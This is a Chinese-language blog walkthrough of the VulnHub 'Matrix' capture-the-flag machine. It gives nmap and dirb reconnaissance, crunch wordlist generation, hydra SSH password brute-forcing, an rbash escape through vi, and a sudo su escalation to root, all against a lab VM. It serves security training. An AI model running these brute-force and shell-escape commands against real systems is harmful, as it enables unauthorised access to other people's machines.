当前位置: 首页 > news >正文

Machine_Matrix打靶渗透【附代码】(权限提升)

news 来源:原创 2024/9/20 7:27:03

靶机下载地址:

https%3A%2F%2Fdownload.vulnhub.com%2Fmatrix%2FMachine_Matrix.zip

1. 主机发现+端口扫描+目录扫描+敏感信息获取

1.1. 主机发现

nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:D9:36:81'

1.2. 端口扫描

nmap -p- 192.168.7.155

1.3. 目录扫描

dirb http://192.168.7.155

1.4. 敏感信息获取

whatweb http://192.168.7.155

2. WEB打点尝试寻找漏洞点

2.1. 进入80端口主页面

1.老规矩,点点功能模块,看看有能利用的点吗 -> 网页提示跟随白兔

2.右键点击兔子 -> 新建标签页打开 -> 有一个图片路径

url提示port:31337端口,拼接访问 -> 无果

3.查看网页源码,给了一段base64加密值

ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=

解码得下文,大意为输出一段内容至Cypher.matrix文件中

echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix

拼接Cypher.matrix试试,直接下载下来了这个文件,文本方式打开看看

熟悉的Brainfuck加密,找工具解密一下

You can enter into matrix as guest, with password k1ll0rXX
# 您可以以访客身份进入矩阵,密码为k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.
# 事实上,我忘记了最后两个字符,所以我用XX代替了。试试你的运气,找到正确的密码字符串。

2.2. GetShell

1.根据他的提示密码是不完整的,使用kali中crunch工具生成字典,暴力破解

crunch 8 8 -t k1ll0r%@ -o passwd.txt

2.使用 hydra 工具进行爆破,得到账号密码【k1ll0r7n】

hydra -l guest -P passwd.txt ssh://192.168.7.155

3.尝试ssh进行连接,连接成功

ssh guest@192.168.7.155

3. 权限提升

3.1. 老规矩看执行命令权限

sudo -l

很多命令受限

export #查看环境变量
# /bin/rbash权限受限制

# 发现vi命令可以使用,vi绕过rbash
vi
# 输入'冒号'
!/bin/bash

发现还是无法执行一些命令 -> 命令可正常执行 -> 执行以下命令,配置环境变量绕过

export PATH=/usr/sbin:/usr/bin:/sbin:/bin
sudo su # 密码k1ll0r7n

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 解决ubuntu 下 SSH无法连接的问题
  • YOLOv8由pt文件中读取模型信息
  • MongoDB 未授权访问漏洞
  • c# 逻辑运算符和条件运算符
  • Spring Boot 参数校验 Validation 使用
  • 反其道而行的SAP商业AI
  • Linux搭建SVN服务器
  • 无法启动此程序,因为计算机中丢失dll的多种解决方法,3分钟修复(dll修复工具详细教程)
  • react中的装饰器
  • FPGA开发——在Quartus中实现对IP核的PLL调用
  • ⌈ 传知代码 ⌋ 基于矩阵乘积态的生成模型
  • HarmonyOS笔记3:从网络数据接口API获取数据
  • 人工智能深度学习系列—深入解析:均方误差损失(MSE Loss)在深度学习中的应用与实践
  • ELK对业务日志进行收集
  • NodeJS 依赖下载及切换下载源
  • 时间复杂度分析经典问题——最大子序列和
  • Cookie 在前端中的实践
  • css的样式优先级
  • Fabric架构演变之路
  • Facebook AccountKit 接入的坑点
  • golang中接口赋值与方法集
  • gops —— Go 程序诊断分析工具
  • Joomla 2.x, 3.x useful code cheatsheet
  • Laravel 中的一个后期静态绑定
  • mockjs让前端开发独立于后端
  • Python连接Oracle
  • React Transition Group -- Transition 组件
  • Work@Alibaba 阿里巴巴的企业应用构建之路
  • 百度贴吧爬虫node+vue baidu_tieba_crawler
  • 得到一个数组中任意X个元素的所有组合 即C(n,m)
  • 欢迎参加第二届中国游戏开发者大会
  • [地铁译]使用SSD缓存应用数据——Moneta项目: 低成本优化的下一代EVCache ...
  • gunicorn工作原理
  • Unity3D - 异步加载游戏场景与异步加载游戏资源进度条 ...
  • ​卜东波研究员:高观点下的少儿计算思维
  • ​软考-高级-信息系统项目管理师教程 第四版【第19章-配置与变更管理-思维导图】​
  • # centos7下FFmpeg环境部署记录
  • #100天计划# 2013年9月29日
  • $Django python中使用redis, django中使用(封装了),redis开启事务(管道)
  • (1)常见O(n^2)排序算法解析
  • (附源码)springboot助农电商系统 毕业设计 081919
  • (附源码)ssm跨平台教学系统 毕业设计 280843
  • (十)【Jmeter】线程(Threads(Users))之jp@gc - Stepping Thread Group (deprecated)
  • (转)VC++中ondraw在什么时候调用的
  • (轉貼) VS2005 快捷键 (初級) (.NET) (Visual Studio)
  • .NET 6 在已知拓扑路径的情况下使用 Dijkstra,A*算法搜索最短路径
  • .net core 连接数据库,通过数据库生成Modell
  • .NET Core实战项目之CMS 第一章 入门篇-开篇及总体规划
  • .NET 的静态构造函数是否线程安全?答案是肯定的!
  • .Net下C#针对Excel开发控件汇总(ClosedXML,EPPlus,NPOI)
  • .NET下的多线程编程—1-线程机制概述
  • .project文件
  • @Autowired标签与 @Resource标签 的区别
  • @NoArgsConstructor和@AllArgsConstructor,@Builder
  • @RequestBody的使用